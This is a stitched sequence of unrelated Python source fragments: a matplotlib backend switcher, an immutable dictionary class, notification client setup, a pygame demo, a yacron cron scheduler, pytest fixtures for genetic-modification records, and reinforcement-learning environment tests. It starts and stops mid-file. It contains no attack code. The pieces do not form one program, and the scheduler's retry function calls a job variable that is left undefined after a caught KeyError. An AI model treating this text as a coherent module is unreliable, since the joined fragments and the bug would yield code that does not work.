        self.new_backend = backend

    def __enter__(self):
        gui, backend = self.shell.enable_matplotlib(self.new_backend)

    def __exit__(self, type, value, tb):
        gui, backend = self.shell.enable_matplotlib(self.old_backend)

def inherit_docs(cls):
    for name, func in vars(cls).items():
        if not func.__doc__:
            for parent in cls.__bases__:
                try:
                    parfunc = getattr(parent, name)
                except AttributeError: # parent doesn't have function
                    break
                if parfunc and getattr(parfunc, '__doc__', None):
                    func.__doc__ = parfunc.__doc__
                    break
    return cls

class ImmutableDict(collections.Mapping):
    def __init__(self, somedict):
        self._dict = dict(somedict)   # make a copy
        self._hash = None

    def __getitem__(self, key):
        return self._dict[key]

    def __len__(self):
        return len(self._dict)

    def __iter__(self):
        return iter(self._dict)

    def __hash__(self):
        if self._hash is None:
            self._hash = hash(frozenset(self._dict.items()))
        return self._hash

    def __eq__(self, other):
        return self._dict == other._dict

from notifications_utils.clients.antivirus.antivirus_client import (
    AntivirusClient,
)
from notifications_utils.clients.redis.redis_client import RedisClient
from notifications_utils.clients.zendesk.zendesk_client import ZendeskClient

antivirus_client = AntivirusClient()
zendesk_client = ZendeskClient()
redis_client = RedisClient()

#!/usr/bin/env python

import pygame

pygame.display.init()
pygame.font.init()

modes_list = pygame.display.list_modes()
#screen = pygame.display.set_mode(modes_list[0], pygame.FULLSCREEN)   # the highest resolution with fullscreen
screen = pygame.display.set_mode(modes_list[-1])                     # the lowest resolution

background_color = (255, 255, 255)
screen.fill(background_color)

font = pygame.font.Font(pygame.font.get_default_font(), 22)
text_surface = font.render("Hello world!", True, (0,0,0))
screen.blit(text_surface, (0,0))         # paste the text at the top left corner of the window

pygame.display.flip()                    # display the image

while True:                              # main loop (event loop)
    event = pygame.event.wait()
    if(event.type == pygame.QUIT or (event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE)):
        break

import asyncio
import asyncio.subprocess
import datetime
import logging
from collections import OrderedDict, defaultdict
from typing import Any, Awaitable, Dict, List, Optional, Union  # noqa
from urllib.parse import urlparse
from aiohttp import web
import yacron.version
from yacron.config import (
    JobConfig,
    parse_config,
    ConfigError,
    parse_config_string,
    WebConfig,
)
from yacron.job import RunningJob, JobRetryState
from crontab import CronTab  # noqa

logger = logging.getLogger("yacron")
WAKEUP_INTERVAL = datetime.timedelta(minutes=1)


def naturaltime(seconds: float, future=False) -> str:
    assert future
    if seconds < 120:
        return "in {} second{}".format(
            int(seconds), "s" if seconds >= 2 else ""
        )
    minutes = seconds / 60
    if minutes < 120:
        return "in {} minute{}".format(
            int(minutes), "s" if minutes >= 2 else ""
        )
    hours = minutes / 60
    if hours < 48:
        return "in {} hour{}".format(int(hours), "s" if hours >= 2 else "")
    days = hours / 24
    return "in {} day{}".format(int(days), "s" if days >= 2 else "")


def get_now(timezone: Optional[datetime.tzinfo]) -> datetime.datetime:
    return datetime.datetime.now(timezone)


def next_sleep_interval() -> float:
    now = get_now(datetime.timezone.utc)
    target = now.replace(second=0) + WAKEUP_INTERVAL
    return (target - now).total_seconds()


def create_task(coro: Awaitable) -> asyncio.Task:
    return asyncio.get_event_loop().create_task(coro)


def web_site_from_url(runner: web.AppRunner, url: str) -> web.BaseSite:
    parsed = urlparse(url)
    if parsed.scheme == "http":
        assert parsed.hostname is not None
        assert parsed.port is not None
        return web.TCPSite(runner, parsed.hostname, parsed.port)
    elif parsed.scheme == "unix":
        return web.UnixSite(runner, parsed.path)
    else:
        logger.warning(
            "Ignoring web listen url %s: scheme %r not supported",
            url,
            parsed.scheme,
        )
        raise ValueError(url)


class Cron:
    def __init__(
        self, config_arg: Optional[str], *, config_yaml: Optional[str] = None
    ) -> None:
        # list of cron jobs we /want/ to run
        self.cron_jobs = OrderedDict()  # type: Dict[str, JobConfig]
        # list of cron jobs already running
        # name -> list of RunningJob
        self.running_jobs = defaultdict(
            list
        )  # type: Dict[str, List[RunningJob]]
        self.config_arg = config_arg
        if config_arg is not None:
            self.update_config()
        if config_yaml is not None:
            # config_yaml is for unit testing
            config, _, _ = parse_config_string(config_yaml, "")
            self.cron_jobs = OrderedDict((job.name, job) for job in config)

        self._wait_for_running_jobs_task = None  # type: Optional[asyncio.Task]
        self._stop_event = asyncio.Event()
        self._jobs_running = asyncio.Event()
        self.retry_state = {}  # type: Dict[str, JobRetryState]
        self.web_runner = None  # type: Optional[web.AppRunner]
        self.web_config = None  # type: Optional[WebConfig]

    async def run(self) -> None:
        self._wait_for_running_jobs_task = create_task(
            self._wait_for_running_jobs()
        )

        startup = True
        while not self._stop_event.is_set():
            try:
                web_config = self.update_config()
                await self.start_stop_web_app(web_config)
            except ConfigError as err:
                logger.error(
                    "Error in configuration file(s), so not updating "
                    "any of the config.:\n%s",
                    str(err),
                )
            except Exception:  # pragma: nocover
                logger.exception("please report this as a bug (1)")
            await self.spawn_jobs(startup)
            startup = False
            sleep_interval = next_sleep_interval()
            logger.debug("Will sleep for %.1f seconds", sleep_interval)
            try:
                await asyncio.wait_for(self._stop_event.wait(), sleep_interval)
            except asyncio.TimeoutError:
                pass

        logger.info("Shutting down (after currently running jobs finish)...")
        while self.retry_state:
            cancel_all = [
                self.cancel_job_retries(name) for name in self.retry_state
            ]
            await asyncio.gather(*cancel_all)
        await self._wait_for_running_jobs_task

        if self.web_runner is not None:
            logger.info("Stopping http server")
            await self.web_runner.cleanup()

    def signal_shutdown(self) -> None:
        logger.debug("Signalling shutdown")
        self._stop_event.set()

    def update_config(self) -> Optional[WebConfig]:
        if self.config_arg is None:
            return None
        config, web_config = parse_config(self.config_arg)
        self.cron_jobs = OrderedDict((job.name, job) for job in config)
        return web_config

    async def _web_get_version(self, request: web.Request) -> web.Response:
        return web.Response(text=yacron.version.version)

    async def _web_get_status(self, request: web.Request) -> web.Response:
        out = []
        for name, job in self.cron_jobs.items():
            running = self.running_jobs.get(name, None)
            if running:
                out.append(
                    {
                        "job": name,
                        "status": "running",
                        "pid": [
                            runjob.proc.pid
                            for runjob in running
                            if runjob.proc is not None
                        ],
                    }
                )
            else:
                crontab = job.schedule  # type: Union[CronTab, str]
                now = get_now(job.timezone)
                out.append(
                    {
                        "job": name,
                        "status": "scheduled",
                        "scheduled_in": (
                            crontab.next(now=now, default_utc=job.utc)
                            if isinstance(crontab, CronTab)
                            else str(crontab)
                        ),
                    }
                )
        if request.headers.get("Accept") == "application/json":
            return web.json_response(out)
        else:
            lines = []
            for jobstat in out:  # type: Dict[str, Any]
                if jobstat["status"] == "running":
                    status = "running (pid: {pid})".format(
                        pid=", ".join(str(pid) for pid in jobstat["pid"])
                    )
                else:
                    status = "scheduled ({})".format(
                        (
                            jobstat["scheduled_in"]
                            if type(jobstat["scheduled_in"]) is str
                            else naturaltime(
                                jobstat["scheduled_in"], future=True
                            )
                        )
                    )
                lines.append(
                    "{name}: {status}".format(
                        name=jobstat["job"], status=status
                    )
                )
            return web.Response(text="\n".join(lines))

    async def _web_start_job(self, request: web.Request) -> web.Response:
        name = request.match_info["name"]
        try:
            job = self.cron_jobs[name]
        except KeyError:
            raise web.HTTPNotFound()
        await self.maybe_launch_job(job)
        return web.Response()

    async def start_stop_web_app(self, web_config: Optional[WebConfig]):
        if self.web_runner is not None and (
            web_config is None or web_config != self.web_config
        ):
            # assert self.web_runner is not None
            logger.info("Stopping http server")
            await self.web_runner.cleanup()
            self.web_runner = None

        if (
            web_config is not None
            and web_config["listen"]
            and self.web_runner is None
        ):
            app = web.Application()
            app.add_routes(
                [
                    web.get("/version", self._web_get_version),
                    web.get("/status", self._web_get_status),
                    web.post("/jobs/{name}/start", self._web_start_job),
                ]
            )
            self.web_runner = web.AppRunner(app)
            await self.web_runner.setup()
            for addr in web_config["listen"]:
                site = web_site_from_url(self.web_runner, addr)
                logger.info("web: started listening on %s", addr)
                try:
                    await site.start()
                except ValueError:
                    pass
            self.web_config = web_config

    async def spawn_jobs(self, startup: bool) -> None:
        for job in self.cron_jobs.values():
            if self.job_should_run(startup, job):
                await self.launch_scheduled_job(job)

    @staticmethod
    def job_should_run(startup: bool, job: JobConfig) -> bool:
        if (
            startup
            and isinstance(job.schedule, str)
            and job.schedule == "@reboot"
        ):
            logger.debug(
                "Job %s (%s) is scheduled for startup (@reboot)",
                job.name,
                job.schedule_unparsed,
            )
            return True
        elif isinstance(job.schedule, CronTab):
            crontab = job.schedule  # type: CronTab
            if crontab.test(get_now(job.timezone).replace(second=0)):
                logger.debug(
                    "Job %s (%s) is scheduled for now",
                    job.name,
                    job.schedule_unparsed,
                )
                return True
            else:
                logger.debug(
                    "Job %s (%s) not scheduled for now",
                    job.name,
                    job.schedule_unparsed,
                )
                return False
        else:
            return False

    async def launch_scheduled_job(self, job: JobConfig) -> None:
        await self.cancel_job_retries(job.name)
        assert job.name not in self.retry_state

        retry = job.onFailure["retry"]
        logger.debug("Job %s retry config: %s", job.name, retry)
        if retry["maximumRetries"]:
            retry_state = JobRetryState(
                retry["initialDelay"],
                retry["backoffMultiplier"],
                retry["maximumDelay"],
            )
            self.retry_state[job.name] = retry_state

        await self.maybe_launch_job(job)

    async def maybe_launch_job(self, job: JobConfig) -> None:
        if self.running_jobs[job.name]:
            logger.warning(
                "Job %s: still running and concurrencyPolicy is %s",
                job.name,
                job.concurrencyPolicy,
            )
            if job.concurrencyPolicy == "Allow":
                pass
            elif job.concurrencyPolicy == "Forbid":
                return
            elif job.concurrencyPolicy == "Replace":
                for running_job in self.running_jobs[job.name]:
                    await running_job.cancel()
            else:
                raise AssertionError  # pragma: no cover
        logger.info("Starting job %s", job.name)
        running_job = RunningJob(job, self.retry_state.get(job.name))
        await running_job.start()
        self.running_jobs[job.name].append(running_job)
        logger.info("Job %s spawned", job.name)
        self._jobs_running.set()

    # continually watches for the running jobs, clean them up when they exit
    async def _wait_for_running_jobs(self) -> None:
        # job -> wait task
        wait_tasks = {}  # type: Dict[RunningJob, asyncio.Task]
        while self.running_jobs or not self._stop_event.is_set():
            try:
                for jobs in self.running_jobs.values():
                    for job in jobs:
                        if job not in wait_tasks:
                            wait_tasks[job] = create_task(job.wait())
                if not wait_tasks:
                    try:
                        await asyncio.wait_for(self._jobs_running.wait(), 1)
                    except asyncio.TimeoutError:
                        pass
                    continue
                self._jobs_running.clear()
                # wait for at least one task with timeout
                done_tasks, _ = await asyncio.wait(
                    wait_tasks.values(),
                    timeout=1.0,
                    return_when=asyncio.FIRST_COMPLETED,
                )
                done_jobs = set()
                for job, task in list(wait_tasks.items()):
                    if task in done_tasks:
                        done_jobs.add(job)
                for job in done_jobs:
                    task = wait_tasks.pop(job)
                    try:
                        task.result()
                    except Exception:  # pragma: no cover
                        logger.exception("please report this as a bug (2)")

                    jobs_list = self.running_jobs[job.config.name]
                    jobs_list.remove(job)
                    if not jobs_list:
                        del self.running_jobs[job.config.name]

                    fail_reason = job.fail_reason
                    logger.info(
                        "Job %s exit code %s; has stdout: %s, "
                        "has stderr: %s; fail_reason: %r",
                        job.config.name,
                        job.retcode,
                        str(bool(job.stdout)).lower(),
                        str(bool(job.stderr)).lower(),
                        fail_reason,
                    )
                    if fail_reason is not None:
                        await self.handle_job_failure(job)
                    else:
                        await self.handle_job_success(job)
            except asyncio.CancelledError:
                raise
            except Exception:  # pragma: no cover
                logger.exception("please report this as a bug (3)")
                await asyncio.sleep(1)

    async def handle_job_failure(self, job: RunningJob) -> None:
        if self._stop_event.is_set():
            return
        if job.stdout:
            logger.info(
                "Job %s STDOUT:\n%s", job.config.name, job.stdout.rstrip()
            )
        if job.stderr:
            logger.info(
                "Job %s STDERR:\n%s", job.config.name, job.stderr.rstrip()
            )
        await job.report_failure()

        # Handle retries...
        state = job.retry_state
        if state is None or state.cancelled:
            await job.report_permanent_failure()
            return

        logger.debug(
            "Job %s has been retried %i times", job.config.name, state.count
        )
        if state.task is not None:
            if state.task.done():
                await state.task
            else:
                state.task.cancel()
        retry = job.config.onFailure["retry"]
        if (
            state.count >= retry["maximumRetries"]
            and retry["maximumRetries"] != -1
        ):
            await self.cancel_job_retries(job.config.name)
            await job.report_permanent_failure()
        else:
            retry_delay = state.next_delay()
            state.task = create_task(
                self.schedule_retry_job(
                    job.config.name, retry_delay, state.count
                )
            )

    async def schedule_retry_job(
        self, job_name: str, delay: float, retry_num: int
    ) -> None:
        logger.info(
            "Cron job %s scheduled to be retried (#%i) " "in %.1f seconds",
            job_name,
            retry_num,
            delay,
        )
        await asyncio.sleep(delay)
        try:
            job = self.cron_jobs[job_name]
        except KeyError:
            logger.warning(
                "Cron job %s was scheduled for retry, but "
                "disappeared from the configuration",
                job_name,
            )
        await self.maybe_launch_job(job)

    async def handle_job_success(self, job: RunningJob) -> None:
        await self.cancel_job_retries(job.config.name)
        await job.report_success()

    async def cancel_job_retries(self, name: str) -> None:
        try:
            state = self.retry_state.pop(name)
        except KeyError:
            return
        state.cancelled = True
        if state.task is not None:
            if state.task.done():
                await state.task
            else:
                state.task.cancel()

import pytest


@pytest.fixture
def genetic_modification(testapp, lab, award):
    item = {
        'award': award['@id'],
        'lab': lab['@id'],
        'modified_site_by_coordinates': {
            'assembly': 'GRCh38',
            'chromosome': '11',
            'start': 20000,
            'end': 21000
        },
        'purpose': 'repression',
        'category': 'deletion',
        'method': 'CRISPR',
        'zygosity': 'homozygous'
    }
    return testapp.post_json('/genetic_modification', item).json['@graph'][0]


@pytest.fixture
def genetic_modification_RNAi(testapp, lab, award):
    item = {
        'award': award['@id'],
        'lab': lab['@id'],
        'modified_site_by_coordinates': {
            'assembly': 'GRCh38',
            'chromosome': '11',
            'start': 20000,
            'end': 21000
        },
        'purpose': 'repression',
        'category': 'deletion',
        'method': 'RNAi'
    }
    return testapp.post_json('/genetic_modification', item).json['@graph'][0]


@pytest.fixture
def genetic_modification_source(testapp, lab, award, source, gene):
    item = {
        'lab': lab['@id'],
        'award': award['@id'],
        'category': 'insertion',
        'introduced_gene': gene['@id'],
        'purpose': 'expression',
        'method': 'CRISPR',
        'reagents': [
            {
                'source': source['@id'],
                'identifier': 'sigma:ABC123'
            }
        ]
    }
    return testapp.post_json('/genetic_modification', item).json['@graph'][0]


@pytest.fixture
def crispr_deletion(lab, award):
    return {
        'lab': lab['@id'],
        'award': award['@id'],
        'category': 'deletion',
        'purpose': 'repression',
        'method': 'CRISPR'
    }


@pytest.fixture
def crispr_deletion_1(testapp, lab, award, target):
    item = {
        'lab': lab['@id'],
        'award': award['@id'],
        'category': 'deletion',
        'purpose': 'repression',
        'method': 'CRISPR',
        'modified_site_by_target_id': target['@id'],
        'guide_rna_sequences': ['ACCGGAGA']
    }
    return testapp.post_json('/genetic_modification', item).json['@graph'][0]



@pytest.fixture
def tale_deletion(lab, award):
    return {
        'lab': lab['@id'],
        'award': award['@id'],
        'category': 'deletion',
        'purpose': 'repression',
        'method': 'TALEN',
        'zygosity': 'heterozygous'
    }


@pytest.fixture
def crispr_tag(lab, award):
    return {
        'lab': lab['@id'],
        'award': award['@id'],
        'category': 'insertion',
        'purpose': 'tagging',
        'method': 'CRISPR'
    }


@pytest.fixture
def bombardment_tag(lab, award):
    return {
        'lab': lab['@id'],
        'award': award['@id'],
        'category': 'insertion',
        'purpose': 'tagging',
        'nucleic_acid_delivery_method': ['bombardment']
    }


@pytest.fixture
def recomb_tag(lab, award):
    return {
        'lab': lab['@id'],
        'award': award['@id'],
        'category': 'insertion',
        'purpose': 'tagging',
        'method': 'site-specific recombination'
    }


@pytest.fixture
def transfection_tag(lab, award):
    return {
        'lab': lab['@id'],
        'award': award['@id'],
        'category': 'insertion',
        'purpose': 'tagging',
        'nucleic_acid_delivery_method': ['stable transfection']
    }


@pytest.fixture
def crispri(lab, award):
    return {
        'lab': lab['@id'],
        'award': award['@id'],
        'category': 'interference',
        'purpose': 'repression',
        'method': 'CRISPR'
    }


@pytest.fixture
def rnai(lab, award):
    return {
        'lab': lab['@id'],
        'award': award['@id'],
        'category': 'interference',
        'purpose': 'repression',
        'method': 'RNAi'
    }


@pytest.fixture
def mutagen(lab, award):
    return {
        'lab': lab['@id'],
        'award': award['@id'],
        'category': 'mutagenesis',
        'purpose': 'repression',
        'method': 'mutagen treatment'
    }


@pytest.fixture
def tale_replacement(lab, award):
    return {
        'lab': lab['@id'],
        'award': award['@id'],
        'category': 'replacement',
        'purpose': 'characterization',
        'method': 'TALEN',
        'zygosity': 'heterozygous'
    }


@pytest.fixture
def mpra(lab, award):
    return {
        'lab': lab['@id'],
        'award': award['@id'],
        'category': 'insertion',
        'purpose': 'characterization',
        'nucleic_acid_delivery_method': ['transduction']
    }


@pytest.fixture
def starr_seq(lab, award):
    return {
        'lab': lab['@id'],
        'award': award['@id'],
        'category': 'episome',
        'purpose': 'characterization',
        'nucleic_acid_delivery_method': ['transient transfection']
    }


@pytest.fixture
def introduced_elements(lab, award):
    return {
        'lab': lab['@id'],
        'award': award['@id'],
        'category': 'episome',
        'purpose': 'characterization',
        'nucleic_acid_delivery_method': ['transient transfection'],
        'introduced_elements': 'genomic DNA regions'
    }

@pytest.fixture
def crispr_tag_1(testapp, lab, award, ctcf):
    item = {
        'lab': lab['@id'],
        'award': award['@id'],
        'category': 'insertion',
        'purpose': 'tagging',
        'method': 'CRISPR',
        'modified_site_by_gene_id': ctcf['@id'],
        'introduced_tags': [{'name': 'mAID-mClover', 'location': 'C-terminal'}]
    }
    return testapp.post_json('/genetic_modification', item).json['@graph'][0]


@pytest.fixture
def mpra_1(testapp, lab, award):
    item = {
        'lab': lab['@id'],
        'award': award['@id'],
        'category': 'insertion',
        'purpose': 'characterization',
        'nucleic_acid_delivery_method': ['transduction'],
        'introduced_elements': 'synthesized DNA',
        'modified_site_nonspecific': 'random'
    }
    return testapp.post_json('/genetic_modification', item).json['@graph'][0]


@pytest.fixture
def recomb_tag_1(testapp, lab, award, target, treatment_5, document):
    item = {
        'lab': lab['@id'],
        'award': award['@id'],
        'category': 'insertion',
        'purpose': 'tagging',
        'method': 'site-specific recombination',
        'modified_site_by_target_id': target['@id'],
        'modified_site_nonspecific': 'random',
        'category': 'insertion',
        'treatments': [treatment_5['@id']],
        'documents': [document['@id']],
        'introduced_tags': [{'name': 'eGFP', 'location': 'C-terminal'}]
    }
    return testapp.post_json('/genetic_modification', item).json['@graph'][0]


@pytest.fixture
def rnai_1(testapp, lab, award, source, target):
    item = {
        'lab': lab['@id'],
        'award': award['@id'],
        'category': 'interference',
        'purpose': 'repression',
        'method': 'RNAi',
        'reagents': [{'source': source['@id'], 'identifier': 'addgene:12345'}],
        'rnai_sequences': ['ATTACG'],
        'modified_site_by_target_id': target['@id']
    }
    return testapp.post_json('/genetic_modification', item).json['@graph'][0]


@pytest.fixture
def genetic_modification_1(lab, award):
    return {
        'modification_type': 'deletion',
        'award': award['uuid'],
        'lab': lab['uuid'],
        'modifiction_description': 'some description'
    }


@pytest.fixture
def genetic_modification_2(lab, award):
    return {
        'modification_type': 'deletion',
        'award': award['uuid'],
        'lab': lab['uuid'],
        'modification_description': 'some description',
        'modification_zygocity': 'homozygous',
        'modification_purpose': 'tagging',
        'modification_treatments': [],
        'modification_genome_coordinates': [{
            'chromosome': '11',
            'start': 5309435,
            'end': 5309451
            }]
    }


@pytest.fixture
def crispr_gm(lab, award, source):
    return {
        'lab': lab['uuid'],
        'award': award['uuid'],
        'source': source['uuid'],
        'guide_rna_sequences': [
            "ACA",
            "GCG"
        ],
        'insert_sequence': 'TCGA',
        'aliases': ['encode:crispr_technique1'],
        '@type': ['Crispr', 'ModificationTechnique', 'Item'],
        '@id': '/crisprs/79c1ec08-c878-4419-8dba-66aa4eca156b/',
        'uuid': '79c1ec08-c878-4419-8dba-66aa4eca156b'
    }


@pytest.fixture
def genetic_modification_5(lab, award, crispr_gm):
    return {
        'modification_type': 'deletion',
        'award': award['uuid'],
        'lab': lab['uuid'],
        'description': 'blah blah description blah',
        'zygosity': 'homozygous',
        'treatments': [],
        'source': 'sigma',
        'product_id': '12345',
        'modification_techniques': [crispr_gm],
        'modified_site': [{
            'assembly': 'GRCh38',
            'chromosome': '11',
            'start': 5309435,
            'end': 5309451
            }]
    }


@pytest.fixture
def genetic_modification_6(lab, award, crispr_gm, source):
    return {
        'purpose': 'validation',
        'category': 'deeltion',
        'award': award['uuid'],
        'lab': lab['uuid'],
        'description': 'blah blah description blah',
        "method": "CRISPR",
        "modified_site_by_target_id": "/targets/FLAG-ZBTB43-human/",
        "reagents": [
            {
                "identifier": "placeholder_id",
                "source": source['uuid']
            }
        ]
    }


@pytest.fixture
def genetic_modification_7_invalid_reagent(lab, award, crispr_gm):
    return {
        'purpose': 'characterization',
        'category': 'deletion',
        'award': award['uuid'],
        'lab': lab['uuid'],
        'description': 'blah blah description blah',
        "method": "CRISPR",
        "modified_site_by_target_id": "/targets/FLAG-ZBTB43-human/",
        "reagents": [
            {
                "identifier": "placeholder_id",
                "source": "/sources/sigma/"
            }
        ]
    }


@pytest.fixture
def genetic_modification_7_valid_reagent(lab, award, crispr_gm):
    return {
        'purpose': 'characterization',
        'category': 'deletion',
        'award': award['uuid'],
        'lab': lab['uuid'],
        'description': 'blah blah description blah',
        "method": "CRISPR",
        "modified_site_by_target_id": "/targets/FLAG-ZBTB43-human/",
        "reagents": [
            {
                "identifier": "ABC123",
                "source": "/sources/sigma/"
            }
        ]
    }


@pytest.fixture
def genetic_modification_7_addgene_source(testapp):
    item = {
        'name': 'addgene',
        'title': 'Addgene',
        'status': 'released'
    }
    return testapp.post_json('/source', item).json['@graph'][0]


@pytest.fixture
def genetic_modification_7_multiple_matched_identifiers(lab, award, crispr_gm):
    return {
        'purpose': 'characterization',
        'category': 'deletion',
        'award': award['uuid'],
        'lab': lab['uuid'],
        'description': 'blah blah description blah',
        "method": "CRISPR",
        "modified_site_by_target_id": "/targets/FLAG-ZBTB43-human/",
        "reagents": [
            {
                "identifier": "12345",
                "source": "/sources/addgene/"
            }
        ]
    }


@pytest.fixture
def genetic_modification_7_multiple_reagents(lab, award, crispr_gm):
    return {
        'purpose': 'characterization',
        'category': 'deletion',
        'award': award['uuid'],
        'lab': lab['uuid'],
        'description': 'blah blah description blah',
        "method": "CRISPR",
        "modified_site_by_target_id": "/targets/FLAG-ZBTB43-human/",
        "reagents": [
            {
                "identifier": "12345",
                "source": "/sources/addgene/",
                "url": "http://www.addgene.org"
            },
            {
                "identifier": "67890",
                "source": "/sources/addgene/",
                "url": "http://www.addgene.org"
            }
        ]
    }


@pytest.fixture
def genetic_modification_8(lab, award):
    return {
        'purpose': 'analysis',
        'category': 'interference',
        'award': award['uuid'],
        'lab': lab['uuid'],
        "method": "CRISPR",
    }


@pytest.fixture
def construct_genetic_modification(
        testapp,
        lab,
        award,
        document,
        target_ATF5_genes,
        target_promoter):
    item = {
        'award': award['@id'],
        'documents': [document['@id']],
        'lab': lab['@id'],
        'category': 'insertion',
        'purpose': 'tagging',
        'nucleic_acid_delivery_method': ['stable transfection'],
        'introduced_tags': [{'name':'eGFP', 'location': 'C-terminal', 'promoter_used': target_promoter['@id']}],
        'modified_site_by_target_id': target_ATF5_genes['@id']
    }
    return testapp.post_json('/genetic_modification', item).json['@graph'][0]


@pytest.fixture
def construct_genetic_modification_N(
        testapp,
        lab,
        award,
        document,
        target):
    item = {
        'award': award['@id'],
        'documents': [document['@id']],
        'lab': lab['@id'],
        'category': 'insertion',
        'purpose': 'tagging',
        'nucleic_acid_delivery_method': ['stable transfection'],
        'introduced_tags': [{'name':'eGFP', 'location': 'N-terminal'}],
        'modified_site_by_target_id': target['@id']
    }
    return testapp.post_json('/genetic_modification', item).json['@graph'][0]


@pytest.fixture
def interference_genetic_modification(
        testapp,
        lab,
        award,
        document,
        target):
    item = {
        'award': award['@id'],
        'documents': [document['@id']],
        'lab': lab['@id'],
        'category': 'interference',
        'purpose': 'repression',
        'method': 'RNAi',        
        'modified_site_by_target_id': target['@id']
    }
    return testapp.post_json('/genetic_modification', item).json['@graph'][0]


@pytest.fixture
def crispr_knockout(lab, award):
    return {
        'lab': lab['@id'],
        'award': award['@id'],
        'category': 'knockout',
        'purpose': 'characterization',
        'method': 'CRISPR'
    }


@pytest.fixture
def recombination_knockout(lab, award):
    return {
        'lab': lab['@id'],
        'award': award['@id'],
        'category': 'knockout',
        'purpose': 'repression',
        'method': 'site-specific recombination',
        'modified_site_by_coordinates': {
            "assembly": "GRCh38",
            "chromosome": "11",
            "start": 60000,
            "end": 62000
        }
    }


@pytest.fixture
def characterization_insertion_transfection(lab, award):
    return {
        'lab': lab['@id'],
        'award': award['@id'],
        'category': 'insertion',
        'purpose': 'characterization',
        'nucleic_acid_delivery_method': ['stable transfection'],
        'modified_site_nonspecific': 'random',
        'introduced_elements': 'synthesized DNA'
    }


@pytest.fixture
def characterization_insertion_CRISPR(lab, award):
    return {
        'lab': lab['@id'],
        'award': award['@id'],
        'category': 'insertion',
        'purpose': 'characterization',
        'method': 'CRISPR',
        'modified_site_nonspecific': 'random',
        'introduced_elements': 'synthesized DNA'
    }


@pytest.fixture
def disruption_genetic_modification(testapp, lab, award):
    item = {
        'lab': lab['@id'],
        'award': award['@id'],
        'category': 'CRISPR cutting',
        'purpose': 'characterization',
        'method': 'CRISPR'
    }
    return testapp.post_json('/genetic_modification', item).json['@graph'][0]


@pytest.fixture
def activation_genetic_modification(testapp, lab, award):
    item = {
        'lab': lab['@id'],
        'award': award['@id'],
        'category': 'CRISPRa',
        'purpose': 'characterization',
        'method': 'CRISPR'
    }
    return testapp.post_json('/genetic_modification', item).json['@graph'][0]


@pytest.fixture
def binding_genetic_modification(testapp, lab, award):
    item = {
        'lab': lab['@id'],
        'award': award['@id'],
        'category': 'CRISPR dCas',
        'purpose': 'characterization',
        'method': 'CRISPR'
    }
    return testapp.post_json('/genetic_modification', item).json['@graph'][0]


@pytest.fixture
def HR_knockout(lab, award, target):
    return {
        'lab': lab['@id'],
        'award': award['@id'],
        'category': 'knockout',
        'purpose': 'repression',
        'method': 'homologous recombination',
        'modified_site_by_target_id': target['@id']
    }


@pytest.fixture
def CRISPR_introduction(lab, award):
    return {
        'lab': lab['@id'],
        'award': award['@id'],
        'category': 'insertion',
        'purpose': 'expression',
        'nucleic_acid_delivery_method': ['transient transfection']
    }


@pytest.fixture
def genetic_modification_9(lab, award, human_donor_1):
    return {
        'lab': lab['@id'],
        'award': award['@id'],
        'donor': human_donor_1['@id'],
        'category': 'insertion',
        'purpose': 'expression',
        'method': 'transient transfection'
    }


@pytest.fixture
def transgene_insertion(testapp, lab, award, ctcf):
    item = {
        'lab': lab['@id'],
        'award': award['@id'],
        'category': 'insertion',
        'purpose': 'in vivo enhancer characterization',
        'nucleic_acid_delivery_method': ['mouse pronuclear microinjection'],
        'modified_site_by_gene_id': ctcf['@id'],
        'introduced_sequence': 'ATCGTA'
    }
    return testapp.post_json('/genetic_modification', item).json['@graph'][0]


@pytest.fixture
def guides_transduction_GM(testapp, lab, award):
    item = {
        'lab': lab['@id'],
        'award': award['@id'],
        'category': 'insertion',
        'purpose': 'expression',
        'nucleic_acid_delivery_method': ['transduction'],
        'introduced_elements': 'gRNAs and CRISPR machinery',
        'MOI': 'high',
        'guide_type': 'sgRNA'
    }
    return testapp.post_json('/genetic_modification', item).json['@graph'][0]


@pytest.fixture
def genetic_modification_10(lab, award):
    return {
        'lab': lab['@id'],
        'award': award['@id'],
        'category': 'insertion',
        'purpose': 'expression',
        'nucleic_acid_delivery_method': ['transduction'],
        'introduced_elements': 'gRNAs and CRISPR machinery',
    }


@pytest.fixture
def genetic_modification_11(lab, award):
    return {
        'lab': lab['@id'],
        'award': award['@id'],
        'category': 'disruption',
        'purpose': 'characterization',
        'method': 'CRISPR'
    }


@pytest.fixture
def transgene_insertion_2(testapp, lab, award, ctcf):
    return {
        'lab': lab['@id'],
        'award': award['@id'],
        'category': 'transgene insertion',
        'purpose': 'in vivo enhancer characterization',
        'nucleic_acid_delivery_method': ['mouse pronuclear microinjection'],
        'modified_site_by_gene_id': ctcf['@id'],
        'introduced_sequence': 'ATCGTA'
    }


@pytest.fixture
def activation_genetic_modification_2(testapp, lab, award):
    return{
        'lab': lab['@id'],
        'award': award['@id'],
        'category': 'activation',
        'purpose': 'characterization',
        'method': 'CRISPR'
    }


@pytest.fixture
def binding_genetic_modification_2(testapp, lab, award):
    return {
        'lab': lab['@id'],
        'award': award['@id'],
        'category': 'binding',
        'purpose': 'characterization',
        'method': 'CRISPR'
    }

from slm_lab.env.vec_env import make_gym_venv
import numpy as np
import pytest


@pytest.mark.parametrize('name,state_shape,reward_scale', [
    ('PongNoFrameskip-v4', (1, 84, 84), 'sign'),
    ('LunarLander-v2', (8,), None),
    ('CartPole-v0', (4,), None),
])
@pytest.mark.parametrize('num_envs', (1, 4))
def test_make_gym_venv_nostack(name, num_envs, state_shape, reward_scale):
    seed = 0
    frame_op = None
    frame_op_len = None
    venv = make_gym_venv(name, num_envs, seed, frame_op=frame_op, frame_op_len=frame_op_len, reward_scale=reward_scale)
    venv.reset()
    for i in range(5):
        state, reward, done, info = venv.step([venv.action_space.sample()] * num_envs)

    assert isinstance(state, np.ndarray)
    assert state.shape == (num_envs,) + state_shape
    assert isinstance(reward, np.ndarray)
    assert reward.shape == (num_envs,)
    assert isinstance(done, np.ndarray)
    assert done.shape == (num_envs,)
    assert len(info) == num_envs
    venv.close()


@pytest.mark.parametrize('name,state_shape, reward_scale', [
    ('PongNoFrameskip-v4', (1, 84, 84), 'sign'),
    ('LunarLander-v2', (8,), None),
    ('CartPole-v0', (4,), None),
])
@pytest.mark.parametrize('num_envs', (1, 4))
def test_make_gym_concat(name, num_envs, state_shape, reward_scale):
    seed = 0
    frame_op = 'concat'  # used for image, or for concat vector
    frame_op_len = 4
    venv = make_gym_venv(name, num_envs, seed, frame_op=frame_op, frame_op_len=frame_op_len, reward_scale=reward_scale)
    venv.reset()
    for i in range(5):
